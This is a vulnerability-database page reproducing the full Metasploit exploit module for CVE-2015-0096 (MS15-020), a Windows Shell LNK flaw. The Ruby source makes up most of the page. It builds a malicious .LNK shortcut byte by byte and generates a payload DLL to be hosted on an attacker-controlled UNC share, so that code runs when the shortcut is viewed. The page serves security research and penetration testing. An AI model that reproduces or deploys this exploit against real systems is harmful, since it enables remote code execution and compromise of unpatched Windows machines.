Lucene search
K

Microsoft Windows Shell LNK Code Execution

🗓️ 11 Mar 2015 22:29:02Reported by Michael Heerklotz, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 90 Views

Microsoft Windows Shell LNK Code Execution. Exploits MS10-046 to abuse Windows Shortcut files containing malicious DLL icon resource. Successful on Windows 2003 SP2 with MS10-046 and Windows 2008 SP2 (32 bits) with MS14-027 installed

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  attr_accessor :dll_base_name
  attr_accessor :exploit_dll_base_name

  def initialize(info = {})
    super(update_info(info,
      'Name'			=> 'Microsoft Windows Shell LNK Code Execution',
      'Description'	=> %q{
        This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling
        of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious
        DLL. This module creates the required files to exploit the vulnerability. They must be
        uploaded to an UNC path accessible by the target. This module has been tested successfully
        on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027
        installed.
      },
      'Author'		=>
        [
          'Michael Heerklotz', # Vulnerability discovery
          'juan vazquez' # msf module
        ],
      'License'		=> MSF_LICENSE,
      'References'	=>
        [
          ['CVE', '2015-0096'],
          ['MSB', 'MS15-020'],
          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'		=>
        {
          'Space'	=> 2048,
        },
      'Platform'		=> 'win',
      'Targets'		=>
        [
          ['Automatic',	{ }]
        ],
      'DisclosureDate' => '2015-03-10',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']),
        OptString.new('UNCHOST', [true, 'The host portion of the UNC path to provide to clients (ex: 1.2.3.4).']),
        OptString.new('UNCSHARE', [true, 'The share folder portion of the UNC path to provide to clients (ex: share).']),
      ])
  end

  def smb_host
    "\\\\#{datastore['UNCHOST']}\\#{datastore['UNCSHARE']}\\"
  end

  def exploit_dll_filename
    name_length = 257 - (smb_host.length + 4 + 2)

    self.dll_base_name = dll_base_name || rand_text_alpha(1)
    self.exploit_dll_base_name = exploit_dll_base_name || rand_text_alpha(name_length)

    "#{dll_base_name} #{exploit_dll_base_name}.dll"
  end

  def dll_filename
    self.dll_base_name = dll_base_name || rand_text_alpha(1)

    "#{dll_base_name}.dll"
  end

  def create_exploit_file(file_name, data)
    unless ::File.directory?(Msf::Config.local_directory)
      FileUtils.mkdir_p(Msf::Config.local_directory)
    end
    path = File.join(Msf::Config.local_directory, file_name)
    full_path = ::File.expand_path(path)
    File.open(full_path, 'wb') { |fd| fd.write(data) }

    full_path
  end

  def dll_create(data)
    full_path = create_exploit_file(dll_filename, data)

    print_good "DLL with payload stored at #{full_path}"
  end

  def exploit_dll_create(data)
    full_path = create_exploit_file(exploit_dll_filename, data)

    print_good "Fake dll to exploit stored at #{full_path}"
  end

  def exploit
    dll = generate_payload_dll
    dll_create(dll)
    exploit_dll_create(dll)

    lnk = generate_link("#{smb_host}#{exploit_dll_filename}")
    file_create(lnk)
  end

  # stolen from ms10_046_shortcut_icon_dllloader, all the credits to the original authors: 'hdm', 'jduck', 'B_H'
  def generate_link(unc)
    uni_unc = unc.unpack('C*').pack('v*')
    path = ''
    path << [
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    ].pack('C*')
    path << uni_unc

    # LinkHeader
    ret = [
      0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    ].pack('C*')

    idlist_data = ''
    idlist_data << [0x12 + 2].pack('v')
    idlist_data << [
      0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
      0x30, 0x9d
    ].pack('C*')
    idlist_data << [0x12 + 2].pack('v')
    idlist_data << [
      0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
      0x30, 0x9d
    ].pack('C*')
    idlist_data << [path.length + 2].pack('v')
    idlist_data << path
    idlist_data << [0x00].pack('v') # TERMINAL WOO

    # LinkTargetIDList
    ret << [idlist_data.length].pack('v') # IDListSize
    ret << idlist_data

    # ExtraData blocks (none)
    ret << [rand(4)].pack('V')

    # Patch in the LinkFlags
    ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N')

    ret
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation